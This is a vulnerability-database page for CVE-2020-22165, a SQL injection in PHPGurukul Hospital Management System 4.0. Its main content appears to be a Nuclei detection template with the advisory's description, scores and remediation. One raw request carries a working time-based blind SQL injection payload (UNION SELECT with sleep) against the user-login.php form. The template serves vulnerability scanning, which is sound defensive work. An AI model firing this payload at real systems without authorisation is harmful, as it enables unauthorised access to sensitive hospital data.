| Reporter | Title | Published | Views | Family All 12 |
|---|---|---|---|---|
| CVE-2020-22165 | 26 Jan 202500:00 | – | circl | |
| PHPGurukul Hospital Management System SQL注入漏洞 | 22 Jun 202100:00 | – | cnnvd | |
| PHPGurukul Hospital Management System SQL Injection Vulnerability (CNVD-2021-44927) | 24 Jun 202100:00 | – | cnvd | |
| CVE-2020-22165 | 22 Jun 202114:14 | – | cve | |
| CVE-2020-22165 | 22 Jun 202114:14 | – | cvelist | |
| EUVD-2020-14930 | 7 Oct 202500:30 | – | euvd | |
| CVE-2020-22165 | 22 Jun 202115:15 | – | nvd | |
| CVE-2020-22165 | 22 Jun 202115:15 | – | osv | |
| Sql injection | 22 Jun 202115:15 | – | prion | |
| PT-2021-10731 · Unknown · Phpgurukul Hospital Management System | 22 Jun 202100:00 | – | ptsecurity |
id: CVE-2020-22165
info:
name: PHPGurukul Hospital Management System 4.0 - SQL Injection
author: ritikchaddha
severity: high
description: |
PHPGurukul Hospital Management System in PHP v4.0 has a SQL injection vulnerability in \hms\user-login.php. Remote unauthenticated users can exploit the vulnerability to obtain sensitive database information.
impact: |
Successful exploitation allows attackers to access sensitive data from the database, potentially leading to data leakage and further compromise of the application.
remediation: |
Upgrade to the latest version or apply proper input sanitization and parameterized queries to mitigate this vulnerability.
reference:
- https://github.com/itodaro/PHPGurukul_Hospital_Management_System4.0_cve
- https://nvd.nist.gov/vuln/detail/CVE-2020-22165
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-22165
epss-score: 0.06348
epss-percentile: 0.92805
cwe-id: CWE-89
cpe: cpe:2.3:a:phpgurukul:hospital_management_system:4.0:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 3
vendor: phpgurukul
product: hospital_management_system
fofa-query: title="Hospital Management System" && body="HMS"
tags: cve2020,cve,hms,cms,sqli,phpgurukul,vkev,vuln
flow: http(1) && http(2)
http:
- raw:
- |
@timeout: 30s
POST /hms/user-login.php HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "Hospital Management")'
- 'status_code == 200'
condition: and
internal: true
- raw:
- |
@timeout: 30s
POST /hms/user-login.php HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
username=a' and 1=2 union select 1,2,if(substring((select user() limit 0,1),1,1)='r',sleep(8),1),4,5,6,7,8,9#&password=asfsafafsafsaf&submit=1&submit=
stop-at-first-match: true
matchers:
- type: dsl
dsl:
- 'duration>=8'
- 'status_code == 200'
condition: and
# digest: 490a00463044022009b27894f203262023c3a08188b2b916ea2ccacd124772ca2a9cc788d447ff9402202beb52677f17a0edd6a566d6bf98101063f5e689bdb70b2b1edbb4564263070d:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation